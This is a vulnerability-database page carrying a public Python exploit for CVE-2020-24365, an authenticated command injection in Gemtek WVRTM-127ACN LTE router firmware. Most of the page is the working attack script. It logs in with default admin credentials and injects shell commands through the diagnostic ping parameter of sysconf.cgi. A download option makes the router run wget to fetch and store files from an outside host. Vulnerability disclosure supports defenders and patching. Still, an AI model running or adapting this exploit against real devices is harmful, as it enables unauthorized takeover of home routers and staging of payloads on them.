Vulners
Lucene search
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2020-24365 | 22 Nov 202020:12 | – | circl |
 | Gemtek WRTM-127ACN Command Injection (CVE-2020-24365) | 1 Dec 202000:00 | – | checkpoint_advisories |
 | CVE-2020-24365 | 24 Sep 202014:17 | – | cve |
 | CVE-2020-24365 | 24 Sep 202014:17 | – | cvelist |
 | CVE-2020-24365 | 24 Sep 202015:15 | – | nvd |
 | CVE-2020-24365 | 24 Sep 202015:15 | – | osv |
 | Gemtek WVRTM-127ACN 01.01.02.141 Command Injection | 19 Nov 202000:00 | – | packetstorm |
 | Default credentials | 24 Sep 202015:15 | – | prion |
# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
# Date: 13/09/2020
# Exploit Author: Gabriele Zuddas
# Version: 01.01.02.127, 01.01.02.141
# CVE : CVE-2020-24365
Service Provider : Linkem
Product Name : LTE CPE
Model ID : WVRTM-127ACN
Serial ID : GMK170418011089
IMEI : XXXXXXXXXXXXX
ICCID : XXXXXXXXXXXXXXXXXX
Firmware Version : 01.01.02.141
Firmware Creation Date : May 15 13:04:30 CST 2019
Bootrom Version : U-Boot 1.1.3
Bootrom Creation Date : Oct 23 2015 - 16:03:05
LTE Support Band : 42,43
Injecting happens here:
sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&
Exploit has been tested on older verions too:
Firmware Version: 01.01.02.127
Firmware Creation Date : May 23 15:34:10 CST 2018
"""
import requests, time, argparse, re, sys
class Exploit():
CVE = "CVE-2020-24365"
def __init__(self, args):
self.args = args
self.session = requests.Session()
def login(self):
s = self.session
r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
if "sid" not in s.cookies:
print("[!] Login failed.")
exit(1)
sid = s.cookies["sid"]
s.headers = {"sid": sid}
print(f"[*] Login successful! (sid={sid})")
def now(self):
return int(time.time() * 1000)
def exploit(self, command):
self.login()
with self.session as s:
payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"
r = s.get(payload)
r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1&time={self.now()}&_={self.now()}")
content = str(r.content, "utf8")
#Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
r = s.get(payload)
r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1&time={self.now()}&_={self.now()}")
content = str(r.content, "utf8")
#TODO: eventually parse content with regex to clean out the output
c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
print(content)
print(c[0])
if len(c) > 0:
return c[0]
else:
return False
def download_file(self, url):
filename = url.rsplit('/', 1)[-1]
if self.args.file is not None:
print(f"[*] Attempting download of file '{filename}' from {url} ...")
if self.exploit(f"wget {url} -O /tmp/{filename}"):
print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")
print(self.exploit(f"du -h /tmp/{filename}"))
return True
else:
print(f"[!] Failed to download {filename} from {url}")
return False
def run(self):
if self.args.command is not None:
print(self.exploit(self.args.command))
exit()
if self.args.file is not None:
self.download_file(self.args.file)
exit()
if __name__ == "__main__":
# Create the parser and add arguments
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")
args = parser.parse_args()
# Run exploit
X = Exploit(args)
if len(sys.argv) > 1:
print(f"[*] Exploiting {X.CVE} ...")
X.run()
else:
parser.print_help(sys.stderr)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Nov 2020 00:00Current
9.1High risk
Vulners AI Score9.1
CVSS 3.18.8
CVSS 29
EPSS0.14152